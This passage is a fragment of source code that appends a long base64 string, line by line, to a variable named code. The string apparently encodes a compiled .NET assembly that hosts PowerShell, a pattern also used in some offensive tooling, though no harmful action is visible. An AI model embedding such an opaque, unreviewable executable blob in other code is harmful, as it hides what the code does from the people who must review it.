            code +="\"AAAEKoIDbzIAAAoggAAAADELchwIAHBzuAAACnoCA31CAAAEKh4Ce0MAAAQqggNvMgAACiD/fwAA\"+""\n"
            code +="\"MQtyHAgAcHO4AAAKegIDfUMAAAQqHgJ7RAAABCoiAgN9RAAABCoeAntFAAAEKiICA31FAAAEKh4C\"+""\n"
            code +="\"e0YAAAQqIgIDfUYAAAQqHgJ7RwAABCoiAgN9RwAABCoeAntIAAAEKiICA31IAAAEKh4Ce0kAAAQq\"+""\n"
            code +="\"IgIDfUkAAAQqAAATMAIATQAAAAAAAAACKBQAAAoEKCEAAAosC3IoCABwc68AAAp6BSghAAAKLAty\"+""\n"
            code +="\"OAgAcHOvAAAKegIDKKAAAAYCBCicAAAGAgUongAABgIgAgAEACioAAAGKgAAABMwCQDLAAAAFQAA\"+""\n"
            code +="\"ESD/AAAAc7kAAAoKIP8AAABzuQAACgsg/wAAAHO5AAAKDAZvugAACg0Hb7oAAAoTBAhvugAAChMF\"+""\n"
            code +="\"Ai0DFisBFwMEBhIDBxIECBIFKLAAAAYtUCirAAAKEwYRBh96MzsGCW+7AAAKCBEFb7sAAAoHEQRv\"+""\n"
            code +="\"uwAACgItAxYrARcDBAYSAwcSBAgSBSiwAAAGLRMoqwAACnOtAAAKehEGc60AAAp6c4EAAAYlBm85\"+""\n"
            code +="\"AAAKb3oAAAYlB285AAAKb3wAAAYlCG85AAAKb34AAAYqABswCQAiAQAAFgAAESD/AAAACiD/AAAA\"+""\n"
            code +="\"CyD/AAAADH6gAAAKDX6gAAAKEwR+oAAAChMFBiiqAAAKDQcoqgAAChMECCiqAAAKEwUCLQMWKwEX\"+""\n"
            code +="\"AwQJEgARBBIBEQUSAiixAAAGLVcoqwAAChMGEQYfejNCCQYorAAACg0RBAcorAAAChMEEQUIKKwA\"+""\n"
            code +="\"AAoTBQItAxYrARcDBAkSABEEEgERBRICKLEAAAYtEyirAAAKc60AAAp6EQZzrQAACnpzigAABiUJ\"+""\n"
            code +="\"Bii1AAAGb4MAAAYlEQQHKLUAAAZvhQAABiURBQgotQAABm+HAAAGEwfePgl+oAAACiipAAAKLAYJ\"+""\n"
            code +="\"KK4AAAoRBH6gAAAKKKkAAAosBxEEKK4AAAoRBX6gAAAKKKkAAAosBxEFKK4AAArcEQcqAAABEAAA\"+""\n"
            code +="\"AgAmALvhAD4AAAAAEzAEACsAAAAXAAARc6UAAAoKFgsCByUXWAsYWii8AAAK0QwILAkGCG+mAAAK\"+""\n"
            code +="\"K+UGb6cAAAoGKgATMAQAKgAAABgAABFzpQAACgoWCysUBgIHGFoovAAACtFvpgAACgcXWAsHAzLo\"+""\n"
            code +="\"Bm+nAAAKBio2AntPAAAEA2+mAAAKKnICKBQAAAoC0BUAAAIohwAACii9AAAKfVUAAAQqAAAAQlNK\"+""\n"
            code +="\"QgEAAQAAAAAADAAAAHYyLjAuNTA3MjcAAAAABQBsAAAAyCIAACN+AAA0IwAA9B0AACNTdHJpbmdz\"+""\n"
            code +="\"AAAAAChBAABICAAAI1VTAHBJAAAQAAAAI0dVSUQAAACASQAAdAkAACNCbG9iAAAAAAAAAAIAAAFX\"+""\n"
            code +="\"P6IdCR4AAAD6ATMAFgAAAQAAAGYAAAAVAAAAWQAAALgAAAArAQAABAAAAL0AAAAmAAAATQAAAAIA\"+""\n"
            code +="\"AAAYAAAACAAAAC0AAABPAAAAAgAAABAAAAAJAAAAAQAAAAQAAAAJAAAAAgAAAAUAAAACAAAAAAAt\"+""\n"
            code +="\"EQEAAAAAAAoAMQzJFwYArAzJFwYAGQ3JFwYA1wsNFxMA6RcAAAYA/wuHEgYAgAyHEgYAYQyHEgYA\"+""\n"
            code +="\"AA2HEgYAzAyHEgYA5QyHEgYAFgyHEgYA6wuqFwYAyQuqFwYARAyHEgYAyBqSEQ4AThEiEg4Aigds\"+""\n"
            code +="\"Fw4AeQtsFw4AOwYiEgYArBOSEQ4AZwYiEgYAYQDjEA4AtxoiEg4AQgAiEg4AbRMiEgYAjRiSEQ4A\"+""\n"
            code +="\"YxxBHA4AyRFBHAYAOgWSEQYA9xNLEg4A0QZBHAYAwRGSEQ4AYBJBHAYAtxS9HA4ADQdBHAYAmQB8\"+""\n"
            code +="\"BA4AthNBHAYAbgB8BA4AxxNBHAYAKwB8BA4AWhAiEg4AFRgiEg4AUxkiEgYAbw/GHQYAkBaSEQ4A\"+""\n"
            code +="\"fAYiEgYA4wqSEQYAfAB8BAYAVR2HEgYANR2DAAYApBPGHQ4ATA5BHA4AUhhBHA4APBFBHA4AAQlB\"+""\n"
            code +="\"HA4AORRBHA4AuhlBHAYAnQySEQYAnhGSEQYArgvJFwYAog69HAYAMhySEQ4AdRUiEg4AeR1sFwYA\"+""\n"
            code +="\"7BaRDgYAiA+SEQ4AmRJsFw4ASAZsFw4APhhsFwYAxQhAGQ4AcAYiEg4Aax0iEg4AAxQiEg4AjQsi\"+""\n"
            code +="\"EgYA0QSRDgYAOROSEQYASAmSEQYAxRZAGQYA0QiSEQYApxSSEQYAkwCSEQYAohSSEQ4AVQAiEg4A\"+""\n"
            code +="\"QRQiEg4A5B0iEg4AaRkiEgYAFQnFAgYAuhuSEWcBxRQAAAYA1g/FAgYAiR2DAAYA6AqSEQYA3QiS\"+""\n"
            code +="\"EQYAAheSEQYAiRGSEQYAUhCqFxIAKhMCEQYAfhOSEQYAUROSEQoAxgiQFAYAOQCSEQAAAAC7AAAA\"+""\n"
            code +="\"AAABAAEAAQAQAGocAABBAAEAAQAAABAAOgkAAEEAAgAEAAAAEACgHAAAcQAIAA0AAAAQAOUGAACB\"+""\n"
            code +="\"AA4AHwABABAA+BcAAEEADwA3AAAAEAAkBwAAkQATAD8AgQEQAEQCAABBABMAWQChAAAAmhsAAAAA\"+""\n"
            code +="\"EwB5AAEAEACbGwAAQQATAHkAAQAQAHYbAABBABcAggCBARAAWxcAAEEAGwCLAAsBEgC5AgAAwQAb\"+""\n"
            code +="\"AIwAAgEAAHEOAADxACAAjAACAQAAWA4AAPEAKQCMAAIAEACXGQAAQQA7AIwAAgAQAHsZAABBAEIA\"+""\n"
            code +="\"mwCDARAATRcAAEEASgCsAAMBEAABAAAAQQBPALYAAgEAAMEHAADxAFAAuAAKABAAuQIAAEEAVQC4\"+""\n"
            code +="\"ABEAmBVIBQEAXRtMBQEAFghPBQEApxxSBQMANwdWBQEARxFaBQEARRBeBQYAXAdWBREAqgRhBQEA\"+""\n"
            code +="\"XhFIBQEA7xNlBQEA2RNlBQEA+QZpBQEALhBtBVOAxQ9kAlOADh1kAlOALQtkAlOAIh1kAgEAswVk\"+""\n"
            code +="\"AgEAlwVkAgEAXgVkAgEAPwVMBQEAswVxBQEAlwVxBQEAXgVxBQEAPwVMBQYAXA1PBQYA5BtDAwYA\"+""\n"
            code +="\"yRxkAgYA2BxkAgYAwxVDAwYGawRPBVaAxAB2BVaA+QN2BVaASgR2BVaAMwR2BVaAfwN2BVaAzwJ2\"+""\n"
            code +="\"BVaAmgN2BVaA4wN2BQYGawRPBVaABAF6BVaAxwN6BVaA8AJ6BVaAEwN6BVaAfQF6BVaADAR6BVaA\"+""\n"
            code +="\"IQJ6BVaA5QB6BVaAWwJ6BVaAJAF6BVaAQwF6BVaAsgN6BVaAeQJ6BVaAmAJ6BVaANQN6BVaAVgN6\"+""\n"
            code +="\"BVaAYgF6BQEAIRNkAgEApAhkAgEAGwZDAwEA6QVDAwEAPwVMBQEABAZ2BQEAeAVPBQEAIRNkAgEA\"+""\n"
            code +="\"pAhkAgEAzQVkAgEAGwZDAwEA6QVDAwEAPwVMBQEABAZ6BQEAeAVPBVaAuQFPBVaABwJPBVaA0wFP\"+""\n"
            code +="\"BVaA7AFPBVaAngFPBQYAsxtxBQYGawRPBVaADhp+BVaAJAV+BVaA/xV+BVaAchh+BQYAXA1PBQYA\"+""\n"
            code +="\"5BtDAwYQyRxkAgYQ2BxkAgYAwxVDA1AgAAAAAIYAihWCBQEAeiAAAAAAhhjfFgEAAgCCIAAAAACR\"+""\n"
            code +="\"GOUWWAICAJAgAAAAAIYY3xYBAAIArCEAAAAAhggxG5sBAgC0IQAAAACGCEAbFQACAL0hAAAAAIYI\"+""\n"
            code +="\"/AflAAMAxSEAAAAAhggJCAUAAwDQIQAAAACBAM0VnQIEANAiAAAAAIEAlBOHBQYAECQAAAAAhgA3\"+""\n"
            code +="\"DRAABwBEJAAAAACBANYAjQUIAMwkAAAAAIYY3xaUBQoABiUAAAAAxggaCxoBCwAOJQAAAADGCAUL\"+""\n"
            code +="\"GgELABYlAAAAAMYImwSaBQsAHSUAAAAAxgiECRABCwAkJQAAAADGCD0C7QALACwlAAAAAMYIvRFM\"+""\n"
            code +="\"AwsANyUAAAAA5gnrBJsBCwBCJQAAAADmCUIHnwULAE8lAAAAAIMITwdbAAsAXSUAAAAAxgAPHAEA\"+""\n"
            code +="\"DABpJQAAAADGACEcAQAMAHUlAAAAAMYA/hEBAAwAdSUAAAAAxgDpEQEADAB3JQAAAADGAE8bBQAM\"+""\n"
            code +="\"AJElAAAAAOYBhwcBAA0ApiUAAAAA5gF6B1sADQC7JQAAAACRGOUWWAIOAAAAAACAAJYgYwifAw4A\"+""\n"
            code +="\"AAAAAIAAkSADGaQFDwAAAAAAgACRIEEVtwUYAMclAAAAAMYIUQLNBSEA0CUAAAAAxgArHNMFIQBw\"+""\n"
            code +="\"JgAAAADGAJwH5wUkAHwnAAAAAOYBnAf1BSgAoCkAAAAAxgBnEAwGLADUKQAAAADGAGcQFgYwAAgq\"+""\n"
            code +="\"AAAAAMYAewoQATYADyoAAAAAxgBlDyYGNgAbKgAAAADGAKgLEAA2ACQqAAAAAMYAqAtVATcAXCoA\"+""\n"
            code +="\"AAAAxgCVClUBOgCUKgAAAADGALAKEAA9AMIqAAAAAMYAvwoQAD4AzioAAAAAxgCVCgEAPwDVKgAA\"+""\n"
            code +="\"AADGAJUKEAA/AOAqAAAAAMYAhAoQAEAAECsAAAAAxgCfChAAQQB1JQAAAADGABYaLAZCAEArAAAA\"+""\n"
            code +="\"AJEAxhA0BkQAwCsAAAAAkQAlGToGRQAULAAAAACGGN8WAQBGACgsAAAAAJMAGglLBkYAkywAAAAA\"+""\n"
            code +="\"kwA6F1QGSgCcLAAAAACTADoXWwZLAIwtAAAAAJMAjQljBk0AmC0AAAAAkwCNCWkGTwAELgAAAACT\"+""\n"
            code +="\"AE0LGQNSAJAuAAAAAJEAoQ8ZA1MAeiAAAAAAhhjfFgEAVADALgAAAADGCFgWcAZUAMcuAAAAAMYI\"+""\n"
            code +="\"bBZ2BlQAzy4AAAAAxghjDX0GVQDgLgAAAADGCHINgwZVAPUuAAAAAMYIqxKKBlYA9S4AAAAAxgi+\"+""\n"
            code +="\"EpAGVgABLwAAAADGCNsN5QBXAAgvAAAAAMYI6g0FAFcAEC8AAAAAxgggFnAGWAAXLwAAAADGCDQW\"+""\n"
            code +="\"dgZYAB8vAAAAAMYItAibAVkAJi8AAAAAxggXDn0GWQAmLwAAAADGCD8OfQZZADcvAAAAAMYI0RKK\"+""\n"
            code +="\"BlkASC8AAAAAxgjkEpAGWQBdLwAAAADGCPkNfQZaAG4vAAAAAMYICA6DBloAgy8AAAAAxghkCRAB\"+""\n"
            code +="\"WwCKLwAAAADGCHQJEABbAHUlAAAAAMYAYBUBAFwAki8AAAAAxgBIGpcGXACeLwAAAADGAAYdpgZd\"+""\n"
            code +="\"AKovAAAAAMYAMxqvBl4Ati8AAAAAxgBaGr8GYgC2LwAAAADGAFoazwZkAMIvAAAAAIYY3xYBAGYA\"+""\n"
            code +="\"yi8AAAAAlgArHNkGZgDVLwAAAACWACsc4AZoAOEvAAAAAJYAKxzoBmsA8S8AAAAAlgArHPEGbwAh\"+""\n"
            code +="\"MAAAAACWAA0P+wZ0AC8wAAAAAJYADQ8CB3YAPzAAAAAAlgANDwoHeQBPMAAAAACWAA0PFwd9AH8w\"+""\n"
            code +="\"AAAAAJYACRnZBoIAkjAAAAAAlgAJGeAGhACcMAAAAACWAAkZ6AaHAKwwAAAAAJYACRnxBosAzDAA\"+""\n"
            code +="\"AAAAlgAJGSUHkACgMQAAAACWAOEO+waTALAxAAAAAJYA4Q4CB5UAvDEAAAAAlgDhDgoHmADMMQAA\"+""\n"
            code +="\"AACWAOEOFwecAOsxAAAAAJYA4Q4uB6EA+DEAAAAAkQCYEDsHpAAMNAAAAACWAO4YSQenABs0AAAA\"+""\n"
            code +="\"AJYA7hhRB6oAJjQAAAAAlgDuGFoHrgA4NAAAAACWAO4YZAezAFI0AAAAAJYA7hhvB7kAXDQAAAAA\"+""\n"
            code +="\"lgDuGHYHugAYNQAAAACWALwOfwe9ACc1AAAAAJYAvA6HB8AANDUAAAAAlgC8DpAHxABGNQAAAACW\"+""\n"
            code +="\"ALwOngfJAGA1AAAAAJYAvA6tB88AajUAAAAAlgC8DrQH0AB0NQAAAACRAHsQwQfTAMA3AAAAAIYI\"+""\n"
            code +="\"4wkQAdYAyDcAAAAAgwjwCRAA1gDRNwAAAACGCKQJEAHXANk3AAAAAIMIswkQANcA4jcAAAAAhgiS\"+""\n"
            code +="\"BhAB2ADqNwAAAACDCJ8GEADYAPM3AAAAAIYIAAWbAdkA+zcAAAAAhggSBRUA2QB6IAAAAACGGN8W\"+""\n"
            code +="\"AQDaAAQ4AAAAAIYI4wkmBtoADDgAAAAAgwjwCc8H2gAVOAAAAACGCKQJJgbbAB04AAAAAIMIswnP\"+""\n"
            code +="\"B9sAJjgAAAAAhgiSBiYG3AAuOAAAAACDCJ8GzwfcADc4AAAAAIYIAAWbAd0APzgAAAAAhggSBRUA\"+""\n"
            code +="\"3QB6IAAAAACGGN8WAQDeAEg4AAAAAJYAJw/WB94AiDgAAAAAhggJExAB3wCQOAAAAACGCBUTEADf\"+""\n"
            code +="\"ALE4AAAAAIYIjAgQAeAAuTgAAAAAhgiYCBAA4ADaOAAAAACGCMYb3QfhAOI4AAAAAIYI1RvhB+EA\"+""\n"
            code +="\"6zgAAAAAhginFd0H4gDzOAAAAACGCLUV4QfiAPw4AAAAAIYIAAWbAeMABDkAAAAAhggSBRUA4wAN\"+""\n"
            code +="\"OQAAAACGCF4Y5gfkABU5AAAAAIYIaBjrB+QAHjkAAAAAhgjYB+UA5QAmOQAAAACGCOoHBQDlADA5\"+""\n"
            code +="\"AAAAAIYY3xawA+YAfjkAAAAAhggJExAB6ACGOQAAAACGCBUTEADoAKc5AAAAAIYIjAgQAekArzkA\"+""\n"
            code +="\"AAAAhgiYCBAA6QDQOQAAAACGCCIKEAHqANg5AAAAAIYIMQoQAOoA4TkAAAAAhgjGG90H6wDpOQAA\"+""\n"
            code +="\"AACGCNUb4QfrAPI5AAAAAIYIpxXdB+wA+jkAAAAAhgi1FeEH7AADOgAAAACGCAAFmwHtAAs6AAAA\"+""\n"
            code +="\"AIYIEgUVAO0AFDoAAAAAhgheGPEH7gAcOgAAAACGCGgY9gfuACU6AAAAAIYI2AflAO8ALToAAAAA\"+""\n"
            code +="\"hgjqBwUA7wA4OgAAAACGGN8W/AfwAAAAAACAAJYg6BgDCPMAAAAAAIAAliADGRUI/QAAAAAAgACW\"+""\n"
            code +="\"ICQVKQgGAQAAAACAAJYgJBUzCAsBAAAAAIAAliBBFT0IEAEAAAAAgACWIEEVUwgZAZQ6AAAAAJYA\"+""\n"
            code +="\"VRRjCCIBbDsAAAAAlgA2D2sIJQGsPAAAAACWACQPcwgoAeQ8AAAAAJYAJA96CCkBeiAAAAAAhhjf\"+""\n"
            code +="\"FgEAKwEaPQAAAACDABYAZgMrASg9AAAAAIYY3xYBACwBAAABANgEAAABAEgNAAABAEgNAAABADcG\"+""\n"
            code +="\"AAACAK4cAAABAE8OAAABADcGAAABANMUAAACAE8OAAABAF4RAAABAEgNAAABABYIAAABAJMHAAAB\"+""\n"
            code +="\"AAkXAAABAO0KAAACALsWAAADAIAIAAAEAOkUAAAFAIMNAgAGAAIVAgAHAJQNAAAIAE8NAAAJAIcY\"+""\n"
            code +="\"AAABAH8YAAACAPYUAAADANoUAAAEAA0KAAAFAP0JAAAGANUJAAAHAGoKAAAIALwGAAAJAKwGAAAB\"+""\n"
            code +="\"ACITAAACAKUIAAADAMkZAAABACITAAACAKUIAAADAKIXAAAEAKwHAAABACITAAACAKUIAAADAKIX\"+""\n"
            code +="\"AAAEAJMXAAABACITAAACAKUIAAADABkKAAAEAE4KAAABACITAAACAKUIAAADABkKAAAEAE4KAAAF\"+""\n"
            code +="\"ACcYAAAGANYZAAABAEgNAAABAEgWAAACAIAWAAADAEgNAAABAEgWAAACAIAWAAADAEgNAAABAKUI\"+""\n"
            code +="\"AAABAEgNAAABAEgNAAABAKUIAAABAKUIAAABALUEAAACAIsGAAABAK4cAAABAKIXAAABAJAaAAAC\"+""\n"
            code +="\"AIwcAAADAHwaAAAEAHUcAAABAL4EAAABAL4EAAACACsJAAABAL4EAAACAOMVAAABAL4EAAACAOMV\"+""\n"
            code +="\"AAADACsJAAABAL4EAAABAL4EAAABAEgNAAABAEgNAAABAEgNAAABAEgNAAABAEgNAAABAEgNAAAB\"+""\n"
            code +="\"AEgNAAABAEgNAAABAAsJAAABANYZAAABALoHAAACAD8SAAADAHgUAAAEAFkRAAABAKgRAAACAGwa\"+""\n"
            code +="\"AAABAAsJAAACAFkRAAABACITAAACAKUIAAABACITAAACAKUIAAADAOQbAAABACITAAACAKUIAAAD\"+""\n"
            code +="\"ABkKAAAEAMgGAAABACITAAACAKUIAAADAOQbAAAEABkKAAAFAMgGAAABACITAAACAKUIAAABACIT\"+""\n"
            code +="\"AAACAKUIAAADAOQbAAABACITAAACAKUIAAADABkKAAAEAMgGAAABACITAAACAKUIAAADAOQbAAAE\"+""\n"
            code +="\"ABkKAAAFAMgGAAABACITAAACAKUIAAABACITAAACAKUIAAADAOQbAAABACITAAACAKUIAAADABkK\"+""\n"
            code +="\"AAAEAMgGAAABACITAAACAKUIAAADAOQbAAAEABkKAAAFAMgGAAABANYZAAACABkKAAADAMgGAAAB\"+""\n"
            code +="\"ACITAAACAKUIAAABACITAAACAKUIAAADAOQbAAABACITAAACAKUIAAADABkKAAAEAMgGAAABACIT\"+""\n"
            code +="\"AAACAKUIAAADAOQbAAAEABkKAAAFAMgGAAABANYZAAACABkKAAADAMgGAAABANYZAAACABkKAAAD\"+""\n"
            code +="\"AMgGAAABAE4KAAACACITAAADAKUIAAABAE4KAAACACITAAADAKUIAAAEAOQbAAABAE4KAAACACIT\"+""\n"
            code +="\"AAADAKUIAAAEABkKAAAFAMgGAAABAE4KAAACACITAAADAKUIAAAEAOQbAAAFABkKAAAGAMgGAAAB\"+""\n"
            code +="\"ANYZAAABANYZAAACABkKAAADAMgGAAABAE4KAAACACITAAADAKUIAAABAE4KAAACACITAAADAKUI\"+""\n"
            code +="\"AAAEAOQbAAABAE4KAAACACITAAADAKUIAAAEABkKAAAFAMgGAAABAE4KAAACACITAAADAKUIAAAE\"+""\n"
            code +="\"AOQbAAAFABkKAAAGAMgGAAABANYZAAABANYZAAACABkKAAADAMgGAAABANYZAAACABkKAAADAMgG\"+""\n"
            code +="\"AAABAEgNAAABAEgNAAABAEgNAAABAEgNAAABAEgNAAABAEgNAAABAEgNAAABAEgNAAABAJcEAAAB\"+""\n"
            code +="\"AEgNAAABAEgNAAABAEgNAAABAEgNAAABAEgNAAABAEgNAAABAEgNAAABACITAAACAKUIAAABAEgN\"+""\n"
            code +="\"AAABAEgNAAABAEgNAAABAEgNAAABAEgNAAABAEgNAAABAEgNAAABAEgNAAABAE4KAAACACITAAAD\"+""\n"
            code +="\"AKUIAAABADEUAAACAEAKAAADAC4FAAAEAK8WAAAFAA0KAAAGAPsZAAAHALwGAAAIAOgZAAAJAE4N\"+""\n"
            code +="\"AAAKAH8YAAABADEUAAACAK8WAAADAHEIAAAEAOcUAAAFAIENAgAGABMVAgAHAKkNAAAIAE4NAAAJ\"+""\n"
            code +="\"AH8YAAABAH8YAAACAA0KAAADALwGAAAEALkYAAAFAKQYAAABAH8YAAACAA0KAAADALwGAAAEALkY\"+""\n"
            code +="\"AAAFAKQYAAABAH8YAAACAPYUAAADANoUAAAEAA0KAAAFAP0JAAAGANUJAAAHAGoKAAAIALwGAAAJ\"+""\n"
            code +="\"AKwGAAABAH8YAAACAPYUAAADANoUAAAEAA0KAAAFAP0JAAAGANUJAAAHAGoKAAAIALwGAAAJAKwG\"+""\n"
            code +="\"AAABAMwYAAACAPQWAAADAL4NAAABAMwYAAACAPQWAAADAL4NAAABAI4UAAABAI4UAAACACcQAAAB\"+""\n"
            code +="\"AJkEBAB1AAUAiQAKACQACwAkAAkA3xYBABEA3xYFABkA3xYBACEA3xYKADEA3xYQADkA3xYQAEEA\"+""\n"
            code +="\"3xYQAEkA3xYQAFEA3xYQAFkA3xYQAGEA3xYQAGkA3xYVAHEA3xYQAHkA3xYQANkB3xYBAOkB3xYB\"+""\n"
            code +="\"APEBHwgeAPkBqw4kAPEBhQ8qAIEA3xYBAJkAaBs8AAEC3xYQAJkAcRVBAAkCawdIAJEAoxEBABEC\"+""\n"
            code +="\"EBZRAIkAaAtWABECYxtRAIkATwdbAIkALRdhAIkArQhnAIkAYAsBABkC1h10AIkABRx5AIkARQZ5\"+""\n"
            code +="\"AIkAIBd/AKEAIBeEAAwAdxGSACkCJBqYAIkArQiiALEAVwbBAEEC3xbHABQA3xYBABQA5wTYABQA\"+""\n"
            code +="\"nwsBABwA+xvlABwAdxGSAMEAwBrpAOEAPQLtABkCHBDlABkCjw/zAAEBvwoQAIkAGRQEAVECbwsK\"+""\n"
            code +="\"AYkAixQBANkA2BAVAIEAfA8QAWECxgQUAWECGgsaAWECBQsaAeEA3xYBAAkB3xYfAWkC3xYQAPEA\"+""\n"
            code +="\"NwUnARkCoRpNAQEBqAtVASQA3xYBACwA0RZxATQA7xuEATEBvBAQAQEBlQoQAHECewqJATEBhAkQ\"+""\n"
            code +="\"AcEAtRqNASQAgBGTAXkCtBybAYECYAsBAAEBlQpVARkB3xYBAPkAGguvATwAzxrzABkCrhq8ARkB\"+""\n"
            code +="\"UAbGAUQA+xvlABkCmREQARkC2xXVARkCrB3bARkCoRrhAUwA3xYBAFQA0RZxAVwA7xuEAUwA5wTY\"+""\n"
            code +="\"ABkBqBofAhkBHBDlABkBVQ0rAkwA+xvlAFEB3xY4AnECqAtAAnECIBZLAnECWBZLAnECNBZRAnEC\"+""\n"
            code +="\"bBZRAnEClQpAAnEClQpYAhkC3h1kAhkCKxtnAhkC3hluApkCfA8QATwA3xaAAkQAdxGSAEEBvBAQ\"+""\n"
            code +="\"ATwA0xqGAgEB3xYBAMEA3xaNAsEABhiSArEC3xadAmQA5wTYAGwA3xYBAKEA3xYBAKEARQbKAqEA\"+""\n"
            code +="\"8hXQAmwA5wTYAMECdRp0AKEARQbXAmwA5xzeAskCtw/pAtkCzgrhARkCoRrwAuEC1goCA5kB+xwH\"+""\n"
            code +="\"A5kBPw0OA5EBTR0TA5EBFRIQAdkCWQoZA+kC7wgeA5EBQR0nA3EC5Q8wA3EC8RowA6kB3xaAAqkB\"+""\n"
            code +="\"2w/lAKkB5hrlAHECzQ00A3EC2w0wA3EC6g06A3ECtAg/A3ECBRAwA3ECExswA3EC1xowA3ECfRQw\"+""\n"
            code +="\"A7EB3xaAArEBLQTlALEBZQTlAHEC9xI0A3EC9Q8wA3ECAhswA3ECMQ40A3ECUAmJAXECWglAAiEB\"+""\n"
            code +="\"3xYBAPkCUBRDA8kCrxFGAwEDvRFMAwkBFhblAMkCwgmJAWkB3xYBAGkBnBRmA2kBXh0BAAkDRAiE\"+""\n"
            code +="\"A/kCuB2LAwkDaBGRAwkDnRYwAwkDZhGWAxED3xYFAAkDKwifAxkD3xYQAGkBHBDlACED3xawAwkD\"+""\n"
            code +="\"sAC2AwkDNhC9AxkC7xzHAykDOhzMA3wA3xbpA4QAmQ/2AyED3xYQABkB3xYFABkBkh3lABkBnx0F\"+""\n"
            code +="\"AAkDpgAlBAkDUQ4yBA4APABLBA4AQACGBA4ARACnBA4ASADGBAgAhADJBAgAiADOBAgAjADTBAgA\"+""\n"
            code +="\"kADYBAgAlADdBAgAmADiBAgAnADnBAgAoADsBAgAqADJBAgArADOBAgAsADxBAgAtAD2BAgAuADT\"+""\n"
            code +="\"BAgAvAD7BAgAwAAABQgAxADdBAgAyADiBAgAzAAFBQgA0AAKBQgA1ADnBAgA2AAPBQgA3AAUBQgA\"+""\n"
            code +="\"4AAZBQgA5AAeBQgA6AAjBQgAKAEoBQgALAEABQgAMAEtBQgANAEtBQgAOAHdBAgARAEyBQgASAE3\"+""\n"
            code +="\"BQgATAE8BQgAUAFBBS4ACwDJBC4AEwDVCC4AGwDeCC4AIwD9CC4AKwAGCS4AMwAWCS4AOwAWCS4A\"+""\n"
            code +="\"QwAWCS4ASwAGCS4AUwAcCS4AWwAWCS4AYwAWCS4AawA0CS4AcwBeCUMAYwBrCYMBCwDJBMMBewDJ\"+""\n"
            code +="\"BOMBewDJBGECgwDJBGMCgwDJBIECgwDJBKECgwDJBMECgwDJBOECgwDJBAEDgwDJBCEDgwDJBEED\"+""\n"
            code +="\"gwDJBKEHgwDJBMEHgwDJBOEHgwDJBAEIgwDJBCEIgwDJBIEIgwDJBKEIgwDJBMEIgwDJBOEIgwDJ\"+""\n"
            code +="\"BAEJgwDJBCEJgwDJBCAPgwDJBEAPgwDJBGAPgwDJBIAPgwDJBKAPgwDJBMAPgwDJBOAPgwDJBAAQ\"+""\n"
            code +="\"gwDJBEAQgwDJBGAQgwDJBIAQgwDJBKAQgwDJBMAQgwDJBOAQgwDJBAARgwDJBCARgwDJBGARCwDJ\"+""\n"
            code +="\"BAASgwDJBCASgwDJBEASgwDJBGASgwDJBIASgwDJBKASgwDJBMASgwDJBOASgwDJBAATgwDJBCAT\"+""\n"
            code +="\"gwDJBOATgwDJBAAUgwDJBCAUgwDJBEAUgwDJBGAUgwDJBIAUgwDJBKAUgwDJBMAUgwDJBOAUgwDJ\"+""\n"
            code +="\"BAAVgwDJBCAVgwDJBEAVgwDJBK4ARgWwAEYFGgAwAHAArgD5AP4ALAGfAecBMwJFAlwCcwKsAuQC\"+""\n"
            code +="\"9wJSA3ADpAPCAwEEEQQdBCsEAwABAAQAAwAFAAsABwAMAAoAFwALABsAEAAfABEAJgAAAFIbgggA\"+""\n"
            code +="\"AA0IhggAAB4LiggAAAkLiggAAJ8EjwgAAGUKlAgAAFgCmAgAAMERnggAAO8EgggAAIoHpAgAAFUC\"+""\n"
            code +="\"qQgAAHAWrwgAANANtQgAAMISuwgAAO4NhggAADgWrwgAALgIgggAABsOtQgAAEMOtQgAAPoSuwgA\"+""\n"
            code +="\"AEYOtQgAAHgJlAgAABAKlAgAANgJlAgAAL8GlAgAABYFgggAABAKwQgAANgJwQgAAL8GwQgAABYF\"+""\n"
            code +="\"gggAABkTlAgAAJwIlAgAANkbxwgAALkVxwgAABYFgggAAIEYywgAAO4HhggAABkTlAgAAJwIlAgA\"+""\n"
            code +="\"AEMKlAgAANkbxwgAALkVxwgAABYFgggAAIEY0AgAAO4HhggCAAUAAwABAAYAAwACAAcABQABAAgA\"+""\n"
            code +="\"BQACAA4ABwACAA8ACQACABAACwACABEADQACABIADwACABMAEQACABQAEwACABUAFQABABYAFQAC\"+""\n"
            code +="\"ACIAFwACAD8AGQABAEAAGQACAEEAGwABAEIAGwACAEMAHQABAEQAHQACAEUAHwABAEYAHwACAEcA\"+""\n"
            code +="\"IQABAEgAIQACAEkAIwACAEoAJQACAEsAJwACAEwAKQABAE0AKQACAE4AKwABAE8AKwACAFAALQAB\"+""\n"
            code +="\"AFEALQACAHkALwABAHoALwACAHsAMQABAHwAMQACAH0AMwABAH4AMwACAH8ANQABAIAANQACAIIA\"+""\n"
            code +="\"NwABAIMANwACAIQAOQABAIUAOQACAIYAOwABAIcAOwACAIgAPQABAIkAPQACAIwAPwABAI0APwAC\"+""\n"
            code +="\"AI4AQQABAI8AQQACAJAAQwABAJEAQwACAJIARQABAJMARQACAJQARwABAJUARwACAJYASQABAJcA\"+""\n"
            code +="\"SQACAJgASwABAJkASwACAJsATQABAJwATQACAJ0ATwABAJ4ATwACAJ8AUQABAKAAUQACAKEAUwAB\"+""\n"
            code +="\"AKIAUwACAKMAVQABAKQAVQACAKUAVwABAKYAVwACAKcAWQABAKgAWQACAKkAWwABAKoAWwAYESIR\"+""\n"
            code +="\"igDSAN4AYAFpAXsBtAHNAQsCEQIYAqMCwgKcA+ID7wMAAT8AYwgBAAYBQQADGQIABgFDAEEVAgAE\"+""\n"
            code +="\"AVkB6BgCAAQBWwEDGQIARAFdASQVAgBEAV8BJBUCAEQBYQFBFQIARAFjAUEVAgAEgAAAAQAAAAAA\"+""\n"
            code +="\"AAAAAAAAAABqHAAAAgAAAAAAAAAAAAAAOQRzBAAAAAADAAUAAAAAAAAAAAA5BPkKAAAAAAEAAAAA\"+""\n"
            code +="\"AAAAAAAAAEIEIhIAAAAAAgAAAAAAAAAAAAAAOQSSEQAAAAANAAUADgAIAA8ACAAQAAgAEQAIABIA\"+""\n"
            code +="\"CAATAAwAFAASABUAEgAAAAQA1wDhAwAABADxAOED1gBhA9YAawPwAGED8ABrA2sB3gMBACQAAgAk\"+""\n"
            code +="\"AAAAADw+Y19fRGlzcGxheUNsYXNzMF8wADxUb1NlY3VyZVN0cmluZz5iX18wAElFbnVtZXJhYmxl\"+""\n"
            code +="\"YDEAQWN0aW9uYDEAUFNEYXRhQ29sbGVjdGlvbmAxAFBTTWVtYmVySW5mb0NvbGxlY3Rpb25gMQBJ\"+""\n"
